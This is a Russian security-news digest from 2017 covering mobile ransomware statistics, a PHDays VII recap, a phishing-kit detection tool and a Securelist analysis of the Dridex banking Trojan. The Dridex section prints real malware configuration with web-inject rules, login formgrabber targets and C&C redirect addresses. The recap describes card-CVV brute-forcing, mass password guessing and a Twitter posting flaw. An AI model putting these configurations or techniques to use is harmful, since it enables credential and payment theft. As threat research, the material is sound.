Новости мира информационной безопасности. Расследование и реагирование на инциденты. Кибербезопасность.

Новости информационной безопасности




Количество мобильных вымогателей увеличилось в 3,5 раза

Согласно отчету «Лаборатории Касперского», в первом квартале 2017 года было обнаружено 218 625 установочных пакетов мобильных троянцев-вымогателей. Это в 3,5 раза больше, чем в предыдущем квартале (61 832 пакетов).

Более 86% зловредов составили представители семейства Congur. Эти троянцы обладают очень простой функциональностью: меняют PIN-код устройства, после чего просят связаться со злоумышленниками для разблокировки. Более того, существуют модификации этого троянца, способные воспользоваться правами суперпользователя и установить свой модуль в системную папку, откуда их практически невозможно удалить.

Однако самым популярным вымогателем в первом квартале стал представитель семейства Fusob: с ним столкнулись более 45% пользователей, атакованных мобильными вымогателями по всему миру. После запуска этот троянец запрашивает права администратора, собирает информацию об устройстве, а затем загружает ее на сервер злоумышленников. После этого он может получить команду на блокировку устройства.

Страной, наиболее пострадавшей от мобильных вымогателей в первом квартале 2017 года, стали США.

 

География мобильных троянцев-вымогателей в первом квартале 2017 года (процент атакованных пользователей)

География мобильных троянцев-вымогателей в первом квартале 2017 года (процент атакованных пользователей)

 

«Ситуация с троянцами-вымогателями в первом квартале была далека от безоблачной. Появилось огромное количество новых вредоносных программ, причем как новых семейств, так и модификаций уже известных зловредов. Пользователи должны помнить, что сегодня злоумышленники могут зашифровывать их данные не только на компьютерах, но и на мобильных устройствах — и это, видимо, будет происходить все чаще», — отметил Роман Унучек, антивирусный эксперт «Лаборатории Касперского».

Дата: 2017-05-25 19:51:25

Источник: https://www.anti-malware.ru/news/2017-05-25/23041



Индустриальный митап #3: в фокусе – безопасная автоматизация техпроцессов

Дата: 2017-05-25 16:22:05

Источник: https://habrahabr.ru/post/329492/



Итоги PHDays VII: хакеры взяли реванш

Подошел к концу Positive Hack Days VII. За два дня форум посетило рекордное число участников — около 5000 из разных стран мира: Америки, Израиля, Кореи, Италии, Франции, Германии, Казахстана, Белоруссии, Индии, Польши.

На площадке произошли сотни событий: семь потоков докладов, мастер-классы, круглые столы и хакерские конкуры. Расскажем обо всем по порядку.

Противостояние: хакеры устроили панику в городе

Начнем, пожалуй, с самой увлекательной части программы — кибербитвы Противостояние. Напомним, что в распоряжении участников был целый полигон с моделью мегаполиса, в котором помимо офисов, телеком-операторов, железной дороги, ТЭЦ и прочих объектов находилось множество IoT-устройств. К барьеру были приглашены «хакеры», «защитники» и security operation centers (SOC).

Первый день был не очень богат на события: только под вечер группе нападающих из Казахстана, команде «ЦАРКА» удалось перехватить компрометирующие СМС самого мэра города. А ночью три команды — Rdot.org, «ЦАРКА» и Vulners — украли из городского банка более 4 миллионов публей (виртуальная валюта города). 

На второй день атакующие добрались до промышленного сектора: команда BIZone смогла нарушить работу сразу двух предприятий города — ТЭЦ и нефтеперерабатывающего завода. В последний час конкурса команда из Казахстана смогла найти автомобиль преступников с украденными деньгами: атакующие перехватили СМС, посылаемые GPS-трекером автомобиля, и смогли вычислить его координаты. Практически в то же время команда BIZone снова смогла остановить нефтеперерабатывающий завод. В первый раз они сделали это посредством атаки на электроподстанцию и ТЭЦ, а в данном случае была проведена именно прямая атака на завод. 

Команде KanzasCityShuffle удалось взломать умный дом, команда «Античат» получила доступ к веб-камере, а команда Hack.ERS смогла украсть деньги пользователей SIP-телефонии: взломав их аккаунты, хакеры «монетизировались» с помощью звонков на платные короткие номера. Уже на последних минутах конкурса команда True0xA3 смогла украсть финансовую отчетность крупной компании города, взломав домашний роутер бухгалтера. 

Результаты и подробные разборы конкурса будут позже, а сейчас мы расскажем о нескольких выступлениях второго дня.

От первого лица

Начался второй день с самой неформальной сессии выступлений «АнтиПленарка. Безопасность и технологии: личный взгляд лидеров мнений». Представители ИБ-сообщества поговорили о наболевшем и рассказали, что мотивирует их. Начал разговор Алексей Качалин (Positive Technologiesinfo-icon), который рассказал о подготовке форума PHDays. Седьмой PHDays — это полгода подготовки, 1100 компаний-участников (из которых только 250 ИБ-компаний), 196 спикеров, 50 партнеров. По словам Алексея Качалина PHDays формирует коммьюнити: «Здесь очень много людей, много идей: это то, что питает нас и двигает. Здесь и сейчас формируется сообщество, готовое мыслить нестандартно, не закрывать глаза и делать лучше ту систему, в которой мы живем и работаем».

Рассказ Дмитрия Мананникова (SPSR Express) был посвящен изменчивости. По его словам, бизнес и безопасность находятся в разных мирах. Безопасность эволюционирует вместе с жизнью людей и ключевым фактором этих изменений является автоматизация, которая на сегодняшний день становится драйвером прогресса, но в то же время и его слабым звеном. 

Дмитрий Мананников поделился своим прогнозом: «Бизнес будет развиваться дальше, потребность в ИБ никуда не денется, техническое преимущество будет нарастать, но безопасностью будут заниматься другие люди. Если мы продолжим заниматься безопасностью как тайным знанием, как непонятной вещью, нацеленной на снижение мифических рисков, бизнес перерастет нас. Безопасность должна эволюционировать и мы должны превращаться из ограничителя в драйвер прогресса». 

Выступление Эльмана Бейбутова (IBMinfo-icon) с докладом «Mind Deep Learning» стало самым настоящим перформансом: на протяжении всего выступления играла музыка из смартфона, а своеобразным содокладчиком стала Siri. Эльман рассказал о перспективах искусственного интеллекта: на сегодняшний день эта технология находится «на уровне пчелы» и до человека ей не хватает еще трех ступеней. По оценкам Бейбутова, стоит ожидать, что к 2040 году искусственный интеллект будет способен принимать решения, как человек. Уже сейчас есть предпосылки для того, чтобы через 7–10 лет боты заменили людей в техподдержке или других сферах, где нужно работать по инструкции. 

Как выжить без ИБ — рассказал Алексей Волков (Сбербанк). Он поделился простым правилом информационной гигиены: «Не делаю, что не надо; делаю, что надо». Ниже на слайде подробная инструкция. 

«Нас с вами пытаются обмануть. Давайте не будем впадать в паранойю и никогда не будем забывать, что самое главное оружие против любого киберпреступления — у нас в голове», — заключил Алексей Волков. 

Мотивационный тон поддержал Владимир Бенгин (Positive Technologies), который поделился тремя правилами, которые помогли ему в работе над большим ИБ-продуктом. Рецепт Владимира Бенгина: нужно верить в то, что ты двигаешь, не нужно витать в облаках и нужно правильно выстроить взаимоотношения с командой. 

Пожалуй, самое откровенное выступление в рамках этой сессии было у Алексея Лукацкого (Ciscoinfo-icon). Он рассказал о своих провалах. Общество ориентировано на успех, поэтому открыто говорить об ошибках в профессиональной сфере не принято. Алексей призвал всех «не бояться лажать» и преподал три урока, как это сделать. «Формула Лукацкого»: нужно распознать ошибку, признать ее и извлечь из нее урок.

Иван Новиков (Wallarminfo-icon) задавался вопросом о том, кто кем управляет: мы машинами или они нами. Ответ оказался пугающе пессимистичным: «Мы реально вкалываем на машины. Подумайте об этом, и давайте с этим что-то делать. Для себя я понял: все, что я умею в этой жизни отлично делать, — нагибать эти машины. Чем я и занимаюсь». 

Под занавес дня прошла дискуссия «Security Path: Dev vs Manage vs Hack». Дмитрий Мананников и Михаил Левин вместе с Владимиром Дрюковым, Дмитрием Горбатовым, Евгением Климовым и Денисом Горчаковым поднимали вопросы о кадрах: где взять специалистов, какой специалист нужен, как мотивировать сотрудников, какими могут быть карьерный рост и возможное развитие технического специалиста. Мнения высказывались разные, а по итогам дискуссии пришли к выводу, что потенциальный ИБ-шник должен «быть смекалистым, иметь техническое образование, быть из неблагополучного района». «Что касается карьерного роста, то тут вывод простой: развивайте в себе управленческие навыки, учитесь управлять проектами, получайте бизнес-образование, интегрируйтесь в бизнес-среду, в рамках которой вы работаете, и только так вы построите карьеру», — подытожил Дмитрий Мананников. 

Слепые пятна сканирования 

На PHDays руководитель департамента исследований PortSwigger Web Security Джеймс Кеттл (James Kettle) рассказал о слепых пятнах в существующих технологиях сканирования: «Как правило, все существующие сканеры плохо ищут редко встречающиеся уязвимости». В ноябре прошлого года Джеймс выпустил сканер с открытым исходным кодом, в котором применен альтернативный подход к поиску уязвимостей. Он показал, как работает сканер, который может выявлять не только известные, но и новые классы уязвимостей. Ближайшие несколько лет Кеттл планирует посвятить работе над усовершенствованием сканера. 

Под ударом телеком и промышленные системы 

О небезопасности сотовых сетей рассказали Кирилл Пузанков, Сергей Машуков, Павел Новиков (Positive Technologies). Они продемонстрировали способы перехвата СМС-сообщений, а также привели неутешительную статистику: «Наши эксперты выявили более 50 разных SS7-атак: среди них раскрытие идентификатора IMSI, раскрытие местоположения, отказ в обслуживании, перехват и подмена СМС-сообщений, перехват звонков, чтение чатов WhatsApp и Telegram. Опыт проведенных нами в 2015 и 2016 годах аудитов мобильных операторов показал, что в 50% случаев возможен перехват и прослушивание голоса, в 58% можно определить местоположение абонента, в 89% возможен перехват СМС».

Брайан Горенк и Фриц Сэндс (Brian Gorenc, Fritz Sands) выступили с анализом уязвимостей SCADA-систем. Они рассказали о слабых местах в разработке HMI-решений и их проявлениях в коде, рассмотрели реальные кейсы и дали рекомендации по поиску уязвимостей HMI и SCADA-систем.

«Такое ощущение, что в мире АСУ ТП и SCADA последних 20 лет просто не было. Повышение качества защиты серверов, браузеров — все это прошло абсолютно мимо SCADA. Можно подумать, что до сих пор девяностые годы», — комментирует Фриц Сэндс. 

«Зачем атаковать HMI? Затем, что он нужен нам для управления критической инфраструктурой. Зачастую атакующий может обмануть оператора и обойти системы сигнализации; так произошло в случае со Stuxnet: системы раннего реагирования были отключены и удалось вывести из строя центрифуги. HMI — это очень интересная цель для атаки. Есть множество специализированных вредоносов для HMI, например тот же Stuxnet и BlackEnergy. Поразительно, но практически ни один HMI в отрасли не пишется с учетом требований информационной безопасности», — отмечает Брайан Горенк.

Добрые и злые боты

Первое место в рейтинге ожиданий на PHDays VII занял доклад Андрея Масаловича «Ты, а не тебя. Армии умных ботов в руках хакера». Сравнив ситуационный центр с шампуром, на острие которого находится конкурентная разведка, Андрей рассказал о способах взлома популярных сайтов и систем с помощью ботов. Среди трюков — автоматизация прохода капчи, подбор данных кредитных карт, публикация в чужом твиттере своих медиафайлов, захват почтовых ящиков и аккаунтов в Facebook. 

Если упрощать, то проход капчи ботами осуществляется с помощь других ботов, дублирующих выпадающие им капчи на взломанных ресурсах: их вводят уже ни о чем не подозревающие люди, а правильные ответы используются для капчей на других сайтах. Андрей также рассказал об исследователе, который, как и многие, обратил внимание, что в популярных интернет-магазинах при заполнении формы с платежной данными проверяется далеко не вся информация. Он решил выяснить — какая именно. Из топ-400 онлайн-магазинов на Amazon.com только 47 магазинов используют 3-D Secure, а 26 магазинов проверяют только два из трех полей карты (к примеру, номер и срок действия, а CVV пропускают). Злоумышленникам легче заполучить номер карты и срок действия, чем CVV, а число возможных вариантов трехзначных кодов проверки подлинности карты ограничено десятью тысячами. Чтобы проверить, как быстро можно подобрать CVV, исследователь создал ботнет на Selenium. Боты шли в сотни магазинов и одновременно пытались сделать покупки, подставляя данные одной и той же карты и разные CVV. В результате на подбор CVV для карт VISA уходило всего 6 секунд. Платежная система Mastercard держалась лучше VISA и блокировала возможность ввода некорректной информации после десяти попыток.

Затем спикер, в седьмой раз выступавший на PHDays, объяснил, как с помощью роботов захватить легион электронных почтовых ящиков. Лобовая брутфорс-атака отбивается очень легко: если знать пароль и пытаться подобрать логин, то блокировка происходит на третьей попытке. Но если осуществлять «горизонтальный брутфорс» с разных серверов (или прокси-серверов) и выбрать один простой пароль, то подбор трех подряд логинов с разницей в несколько миллисекунд будет трактоваться сервером как три одиночных ошибочных набора и не повлечет никаких последствий. Никаких санкций со стороны почтового сервера не будет даже при миллионе попыток. Таким образом, атакующий может взять базу из миллиона логинов и начать проверять гипотезы, последовательно захватывая почтовые ящики с паролями 123456, Qwerty и т. п. Андрей Масалович отметил, что сегодня единый пароль является одним из признаков, по которым распознают ботнеты, причем такой пароль может быть весьма корявым и нестандартным. Это приводит к тому, что в базах утекших паролей некоторые сложные пароли встречаются целыми батальонами. 

Следующий шаг — это Facebook. Если пользователь забывает пароль, открывается окошко «Введите код подтверждения», после чего приходит код подтверждения. По словам Андрея, этот код формируется довольно сложным и «нераскалываемым» способом, но держится в относительно узком диапазоне: количество вариантов одномоментно не превышает миллиона. Человек может сначала нажать кнопку «забыл пароль», получить код подтверждения, после чего запросить восстановление пароля от имени миллиона пользователей — и «скормить» этот код миллиону ботов, которые одновременно введут этот код. Так можно захватить примерно 20 аккаунтов в Facebook, но подобный фокус возможен только при одновременной атаке множеством ботов. 

И наконец — Твиттер: в нем есть сервис хранения медиафайлов, который позволяет делиться ими с другими пользователями. Выяснилось, что можно разместить пост с медиафайлом от имени жертвы, не ломая аккаунт. Для этого надо загрузить на ads.twitter.com свой файл, поделиться им с аккаунтом жертвы, после чего перехватить запрос публикации и подменить в POST значения owner_id и user_id на id аккаунта жертвы. Твит будет опубликован от чужого имени. 

Среди экспресс-докладов Fast Track самым ожидаемым было выступление Антона Лопаницына «Зато удобно! (Утечки из-за ботов в мессенджерах)». Сегодня боты популярного мессенджера Telegram используются не только для поиска картинок, песен и перевода валют, но и в корпоративной среде — для автоматизации внутренних и внешних процессов. Они применяются, например, в качестве таск-менеджера для Jira. У ботов уже есть интеграция с Teamcity, Redmine, Zabbix, Jenkins, Nagios, системами контроля версий и внутренними сервисами компаний. Докладчик, посетовав на отсутствие документации по методам в API Telegram, взял на сайте HeadHunter список организаций и с помощью аргумента type bot поискал названия компаний в Telegram. Исследователь обнаружил, что из-за отсутствия авторизации пользователя в ботах Telegram любой человек, добавив корпоративный бот, может, например, забронировать переговорную комнату в совершенно посторонней компании, заспамить систему контроля опозданий, поменять статусы задач в системах управления проектами, отправить в отпуск сотрудника... Он также предположил возможность внедрения SQL-кода в СУБД, если бот будет работать с базой данных, а также наличие риска выполнения произвольного кода за счет эксплуатации сторонних библиотек ботов Telegram для работы с медиафайлами.

Записи докладов доступны на www.phdays.ru. В ближайшее время будут опубликованы результаты конкурсов и итоги Противостояния. 

Дата: 2017-05-25 15:52:23

Источник: https://www.anti-malware.ru/news/2017-05-25/23042



PhishingKitHunter - Find Phishing Kits Which Use Your Brand/Organization'S Files And Image

Find phishing kits which use your brand/organization's files and image.

PhishingKitHunter (or PKHunter) is a tool made for identifying phishing kits URLs used in phishing campains targeting your customers and using some of your own website files (as CSS, JS, ...). This tool - write in Python 3 - is based on the analysis of referer's URL which GET particular files on the legitimate website (as some style content) or redirect user after the phishing session. Log files (should) contains the referer URL where the user come from and where the phishing kit is deployed. PhishingKitHunter parse your logs file to identify particular and non-legitimate referers trying to get legitimate pages based on regular expressions you put into PhishingKitHunter's config file.


Features

Usage
$ ./PhishingKitHunter-0.6.py -i LogFile2017.log -o PKHunter-report-20170502-013307.json -c conf/test.conf

  _ \  |  / |   |             |            
 |   | ' /  |   | |   | __ \  __|  _ \  __|
 ___/  . \  ___ | |   | |   | |    __/ |   
_|    _|\_\_|  _|\__,_|_|  _|\__|\___|_|   

-= Phishing Kit Hunter - v0.6b =-

[+] http://badscam.org/includes/ap/?a=2
  |   Timestamp: 01/May/2017:13:00:03
  | HTTP status: can't connect (HTTP Error 404: Not Found)
[+] http://scamme.com/aple/985884e5b60732b1245fdfaf2a49cdfe/
  |   Timestamp: 01/May/2017:13:00:49
  | HTTP status: can't connect (<urlopen error [Errno -2] Name or service not known>)
[+] http://badscam-er.com/eb/?e=4
  |   Timestamp: 01/May/2017:13:01:06
  | HTTP status: can't connect (<urlopen error [Errno -2] Name or service not known>)
[+] http://assur.cam.tech/scam/brand/new/2bd5a55bc5e768e530d8bda80a9b8593/
  |   Timestamp: 01/May/2017:13:01:14
  | HTTP status: UP
  | HTTP shash : 0032588b8d93a807cf0f48a806ccf125677503a6fabe4105a6dc69e81ace6091
[+] http://phish-other.eu/assur/big/phish/2be1c6afdbfc065c410d36ba88e7e4c9/
  |   Timestamp: 01/May/2017:13:01:15
  | HTTP status: UP
  | HTTP shash : 2a545c4d321e3b3cbb34af62e6e6fbfbdbc00a400bf70280cb00f4f6bb0eac44
697475it [06:41, 1208.14it/s]

Help
$ ./PhishingKitHunter-0.6.py --help

  _ \  |  / |   |             |            
 |   | ' /  |   | |   | __ \  __|  _ \  __|
 ___/  . \  ___ | |   | |   | |    __/ |   
_|    _|\_\_|  _|\__,_|_|  _|\__|\___|_|    

-= Phishing Kit Hunter - v0.6b =-

   -h --help   Prints this
   -i --ifile    Input logfile to analyse
   -o --ofile    Output JSON report file (default: ./PKHunter-report-'date'-'hour'.json)
   -c --config   Configuration file to use (default: ./conf/defaults.conf)

JSON report example
$ cat ./PKHunter-report-20170502-013307.json

{
    "PK_URL": "http://badscam.org/includes/ap/?a=2",
    "PK_info": {
        "Domain": "badscam.org",
        "HTTP_sha256": "",
        "HTTP_status": "can't connect (HTTP Error 404: Not Found)",
        "date": "01/May/2017:13:00:03"
    }
}{
    "PK_URL": "http://assur.cam.tech/scam/brand/new/2bd5a55bc5e768e530d8bda80a9b8593/",
    "PK_info": {
        "Domain": "assur.cam.tech",
        "HTTP_sha256": "0032588b8d93a807cf0f48a806ccf125677503a6fabe4105a6dc69e81ace6091",
        "HTTP_status": "UP",
        "date": "01/May/2017:13:01:14"
    }
}
[...]

Requirements

Install
Install the requirements
pip install -r requirements.txt

Configure
Please read the conf/default.conf file to learn how to configure PhishingKitHunter.

Дата: 2017-05-25 15:43:09

Источник: http://www.kitploit.com/2017/05/phishingkithunter-find-phishing-kits.html



Dridex: A History of Evolution

no-image

The Dridex banking Trojan, which has become a major financial cyberthreat in the past years (in 2015, the damage done by the Trojan was estimated at over $40 million), stands apart from other malware because it has continually evolved and become more sophisticated since it made its first appearance in 2011. Dridex has been able to escape justice for so long by hiding its main command-and-control (C&C) servers behind proxying layers. Given that old versions stop working when new ones appear and that each new improvement is one more step forward in the systematic development of the malware, it can be concluded that the same people have been involved in the Trojan’s development this entire time. Below we provide a brief overview of the Trojan’s evolution over six years, as well as some technical details on its latest versions.

Dridex: A History of Evolution

How It All Began

Dridex made its first appearance as an independent malicious program (under the name “Cridex”) around September 2011. An analysis of a Cridex sample (MD5: 78cc821b5acfc017c855bc7060479f84) demonstrated that, even in its early days, the malware could receive dynamic configuration files, use web injections to steal money, and was able to infect USB media. This ability influenced the name under which the “zero” version of Cridex was detected — Worm.Win32.Cridex.

That version had a binary configuration file:

Dridex: A History of Evolution

Sections named databefore, datainject, and dataafter made the web injections themselves look similar to the widespread Zeus malware (there may have been a connection between this and the 2011 Zeus source code leak).

Cridex 0.77–0.80

In 2012, a significantly modified Cridex variant (MD5: 45ceacdc333a6a49ef23ad87196f375f) was released. The cybercriminals had dropped functionality related to infecting USB media and replaced the binary format of the configuration file and packets with XML. Requests sent by the malware to the C&C server looked as follows:

<message set_hash="" req_set="1" req_upd="1">
    <header>
        <unique>WIN-1DUOM1MNS4F_A47E8EE5C9037AFE</unique>
        <version>600</version>
        <system>221440</system>
        <network>10</network>
    </header>
    <data></data>
</message>

The <message> tag was the XML root element. The <header> tag contained information about the system, bot identifier, and the version of the bot.

Here is a sample configuration file:

<packet><commands><cmd id="1354" type="3"><httpinject><conditions><url type="deny">\.(css|js)($|\?)</url><url type="allow" contentType="^text/(html|plain)"><![CDATA[https://.*?\.usbank\.com/]]></url></conditions><actions><modify><pattern><![CDATA[<body.*?>(.*?)]]></pattern><replacement><![CDATA[<link href="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8/themes/base/jquery-ui.css" rel="stylesheet" type="text/css"/>
  <style type="text/css">
    .ui-dialog-titlebar{ background: white }
.text1a{font-family: Arial; font-size: 10px;}

With the exception of the root element <packet>, the Dridex 0.8 configuration file remained virtually unchanged until version 3.0.

Dridex 1.10

The “zero” version was maintained until June 2014. A major operation (Operation Tovar) to take down another widespread malicious program — Gameover Zeus — was carried out that month. Nearly as soon as Zeus was taken down, the “zero” version of Cridex stopped working and Dridex version 1.100 appeared almost exactly one month afterward (on June 22).

Dridex: A History of Evolution

Sample configuration file:

<root>
<settings hash="65762ae2bf50e54757163e60efacbe144de96aca">
<httpshots>
<url type="deny" onget="1" onpost="1">\.(gif|png|jpg|css|swf|ico|js)($|\?)</url>
<url type="deny" onget="1" onpost="1">(resource\.axd|yimg\.com)</url>
</httpshots>
<formgrabber>
<url type="deny">\.(swf)($|\?)</url><url type="deny">/isapi/ocget.dll</url>
<url type="allow">^https?://aol.com/.*/login/</url>
<url type="allow">^https?://accounts.google.com/ServiceLoginAuth</url>
<url type="allow">^https?://login.yahoo.com/</url>
...
<redirects>
<redirect name="1st" vnc="0" socks="0" uri="http://81.208.13.10:8080/injectgate" timeout="20">twister5.js</redirect>
<redirect name="2nd" vnc="1" socks="1" uri="http://81.208.13.10:8080/tokengate" timeout="20">mainsc5.js</redirect>
<redirect name="vbv1" vnc="0" socks="0" postfwd="1" uri="http://23.254.129.192:8080/logs/dtukvbv/js.php" timeout="20">/logs/dtukvbv/js.php</redirect>
<redirect name="vbv2" vnc="0" socks="0" postfwd="1" uri="http://23.254.129.192:8080/logs/dtukvbv/in.php" timeout="20">/logs/dtukvbv/in.php</redirect>
</redirects>
<httpinjects>
<httpinject><conditions>
<url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://.*/tdsecure/intro\.jsp.*]]></url>
<url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)</url>
</conditions>
<actions>
<modify><pattern modifiers="msU"><![CDATA[onKeyDown\=".*"]]></pattern><replacement><![CDATA[onKeyDown=""]]></replacement></modify>
<modify><pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern><replacement><![CDATA[\1<style type="text/css">
body {visibility: hidden; }
</style>
...

This sample already has redirects for injected .js scripts that are characteristic of Dridex.

Here is a comparison between Dridex and Gameover Zeus injections:

Dridex: A History of Evolution

Thus, the takedown of one popular botnet (Gameover Zeus) led to a breakthrough in the development of another, which had many strong resemblances to its predecessor.

We mentioned above that Dridex had begun to use PCRE, while its previous versions used SLRE. Remarkably, the only other banking malware that also used SLRE was Trojan-Banker.Win32.Shifu. That Trojan was discovered in August 2015 and was distributed through spam via the same botnets as Dridex. Additionally, both banking Trojans used XML configuration files.

We also have reasons to believe that, at least in 2014, the cybercriminals behind Dridex were Russian speakers. This is supported by comments in the command & control server’s source code:

Dridex: A History of Evolution

And by the database dumps:

Dridex: A History of Evolution

Dridex: from Version 2 to Version 3

By early 2015, Dridex implemented a kind of P2P network, which is also reminiscent of the Gameover Zeus Trojan. On that network, some peers (supernodes) had access to the C&C and forwarded requests from other network nodes to it. The configuration file was still stored in XML format, but it got a new section, <nodes>, which contained an up-to-date peer list. Additionally, the protocol used for communication with the C&C was encrypted.

Dridex: from Version 3 to Version 4

One of the administrators of the Dridex network was arrested on August 28, 2015. In the early days of September, networks with identifiers 120, 200, and 220 went offline. However, they came back online in October and new networks were added: 121, 122, 123, 301, 302, and 303.

Notably, the cybercriminals stepped up security measures at that time. Specifically, they introduced geo-filtering wherein an IP field appeared in C&C request packets, which was then used to identify the peer’s country. If it was not on the list of target countries, the peer received an error message.

In 2016, the loader became more complicated and encryption methods were changed. A binary loader protocol was introduced, along with a <settings> section, which contained the configuration file in binary format.

Dridex 4.x. Back to the Future

The fourth version of Dridex was detected in early 2017. It has capabilities similar to the third version, but the cybercriminals stopped using the XML format in the configuration file and packets and went back to binary. The analysis of new samples is rendered significantly more difficult by the fact that the loader now works for two days, at most. This is similar to Lurk, except that Lurk’s loader was only active for a couple of hours.

Analyzing the Loader’s Packets

The packet structure in the fourth version is similar to those in the late modifications of the loader’s 3.x versions. However, the names of the modules requested have been replaced with hashes:

Dridex: A History of Evolution

Here is the function that implements C&C communication and uses these hashes:

Dridex: A History of Evolution

Knowing the packet structure in the previous version, one can guess which hash relates to which module by comparing packets from the third and fourth versions.

In the fourth version of Dridex, there are many places where the CRC32 hashing algorithm is used, including hashes used to search for function APIs and to check packet integrity. It would make sense for hashes used in packets to be none other than CRC32 of requested module names. This assumption can easily be verified by running the following Python code:

Dridex: A History of Evolution

That’s right – the hashes obtained this way are the same as those in the program’s code.

With regards to encryption of the loader’s packets, nothing has changed. As in Dridex version 3, the RC4 algorithm is used, with a key stored in encrypted form in the malicious program’s body.

One more change introduced in the fourth version is that a much stricter loader authorization protocol is now used. A loader’s lifespan has been reduced to one day, after which encryption keys are changed and old loaders become useless. The server responds to requests from all outdated samples with error 404.

Analysis of the Bot’s Protocol and Encryption

Essentially, the communication of Dridex version 4 with its C&C is based on the same procedure as before, with peers still acting as proxy servers and exchanging modules. However, encryption and packet structure have changed significantly; now a packet looks like the <settings> section from the previous Dridex version. No more XML.

Dridex: A History of Evolution

The Basic Packet Generation function is used to create packets for communication with the C&C and with peers. There are two types of packets for the C&C:

  1. Registration and transfer of the generated public key
  2. Request for a configuration file

The function outputs the following packet:

Dridex: A History of Evolution

A packet begins with the length of the RC4 key (74h) that will be used to encrypt strings in that packet. This is followed by two parts of the key that are the same size. The actual key is calculated by performing XOR on these blocks. Next comes the packet type (00h) and encrypted bot identifier.

Peer-to-Peer Encryption

Sample encrypted P2P packet:

Dridex: A History of Evolution

The header of a P2P packet is a DWORD array, the sum of all elements in which is zero. The obfuscated data size is the same as in the previous version, but the data is encrypted differently:

Dridex: A History of Evolution

The packet begins with a 16-byte key, followed by 4 bytes of information about the size of data encrypted with the previous key using RC4. Next comes a 16-byte key and data that has been encrypted with that key using RC4. After decryption we get a packet compressed with gzip.

Peer to C&C Encryption

As before, the malware uses a combination of RSA, RC4 encryption, and HTTPS to communicate with the C&C. In this case, peers work as proxy servers. An encrypted packet has the following structure: 4-byte CRC, followed by RSA_BLOB. After decrypting RSA (request packets cannot be decrypted without the C&C private key), we get a GZIP packet.

Configuration File

We have managed to obtain and decrypt the configuration file of botnet 222:

Dridex: A History of Evolution

It is very similar in structure to the <settings> section from the previous version of Dridex. It begins with a 4-byte hash, which is followed by the configuration file’s sections.

struct DridexConfigSection {
  BYTE SectionType;
  DWORD DataSize;
  BYTE Data[DataSize];
};

The sections are of the same types as in <settings>:

The only thing that has changed is the encryption of strings in the configuration file – RC4 is now used.

struct EncryptedConfigString{
  BYTE RC4Key1[16]; // Size's encryption key
  DWORD EncryptedSize;
  BYTE RC4Key2[16]; // Data's encryption key
  BYTE EncryptedData[Size];
};

RC4 was also used to encrypt data in p2p packets.

Geographical Distribution

Dridex: A History of Evolution

The developers of Dridex look for potential victims in Europe. Between January 1st and early April 2017, we detected Dridex activity in several European countries. The UK accounted for more than half (nearly 60%) of all detections, followed by Germany and France. At the same time, the malware never works in Russia, as the C&Cs detect the country via IP address and do not respond if the country is Russia.

Conclusion

In the several years that the Dridex family has existed, there have been numerous unsuccessful attempts to block the botnet’s activity. The ongoing evolution of the malware demonstrates that the cybercriminals are not about to bid farewell to their brainchild, which is providing them with a steady revenue stream. For example, Dridex developers continue to implement new techniques for evading the User Account Control (UAC) system. These techniques enable the malware to run its malicious components on Windows systems.

It can be surmised that the same people, possibly Russian speakers, are behind the Dridex and Zeus Gameover Trojans, but we do not know this for a fact. The damage done by the cybercriminals is also impossible to assess accurately. Based on a very rough estimate, it has reached hundreds of millions of dollars by now. Furthermore, given the way that the malware is evolving, it can be assumed that a significant part of the “earnings” is reinvested into the banking Trojan’s development.

The analysis was performed based on the following samples:

Dridex4 loader: d0aa5b4dd8163eccf7c1cd84f5723d48
Dridex4 bot: ed8cdd9c6dd5a221f473ecf3a8f39933

Дата: 2017-05-25 13:56:27

Источник: https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/



Фишинг «своими руками». Опыт компании «Актив», часть первая

Спамом в наше время никого не увидишь. Мы к нему привыкли и уже воспринимаем как данность. С другой стороны, спам перестает быть просто рекламой, все больше и больше «писем счастья» являются фишингом. Текст данных писем составляется с целью побудить получателя выполнить то или иное действие.


Немного теории

Фи́шинг (англ. phishing, от fishing — рыбная ловля, выуживание) — вид интернет-мошенничества, целью которого является получение доступа к конфиденциальным данным пользователей — логинам и паролям.

«Спирфишинг» (англ. spear phishing ) – вид фишинга, при котором злоумышленник формирует фишинговое письмо под конкретного получателя, используя собранные ранее данные о получателе.


Почему это все так опасно?

Перейдя по вредоносной ссылке или открыв вложение к письму, вы запускаете вирус или троян, который может получить контроль над вашим компьютером и информационными системами компании. Спирфишинг – более опасный вид фишинга. Зловредность его связана с тем, что любой человек, получив персональное, адресованное именно ему письмо, уже не считает это письмо спамом и склонен доверять и открывать любые ссылки/файлы.


А действительно ли это актуально?

Мошенничество с использованием корпоративной электронной почты набирает обороты. За первую половину 2016 года ФБР зафиксировала 22 тыс. жертв этого вида мошенничества, при этом финансовые потери составили более 3 млрд долларов. Почта на сегодня является основным методом проникновения в корпоративную сеть. Злоумышленники не видят разницы между компаниями малого, среднего и крупного бизнеса. Киберпреступники играют вдолгую против крупных компаний, но это не значит, что малый бизнес им менее интересен. Ниже приведу интересную инфографику, показывающую что все больше злоумышленников интересует именно малый бизнес.




Мошенники все чаще и чаще используют шифрование (упоминать WannaCry уже становится плохим тоном) как оружие. 2016 год Cisco назвало "Year of ransome". За первые 3 месяца 2016 года мошенники заработали более 200 000 000$. По оценкам, к концу года "выручка" составила более миллиарда долларов.



Эксперты, сообщество, правоохранительные органы говорят: не платите злоумышленникам, этим вы поощряете их на продолжение деятельности. Но люди и компании платят, уровень шифровальшиков растет. Если первые шифровальщики были похожи на работу студентов первого курса по программированию, то сейчас этим стали заниматься настоящие профессионалы своего дела. Уже встречаются криптографически стойкие шифровальщики.

Компания часто может встать перед выбором: платить, или просто прекратить свою деятельность. Естественно многие, практически все платят. Вам ведь также страшно, как и мне? Нет? Тогда давайте прибавим к этому социальную инженерию. Все мы сейчас используем Facebook, vk, twitter и т.п. Для нашего удобства социальные сети объединяют людей в группы. Мы сами заполняем профили, указываем где мы живем, название компании, в которой работаем.



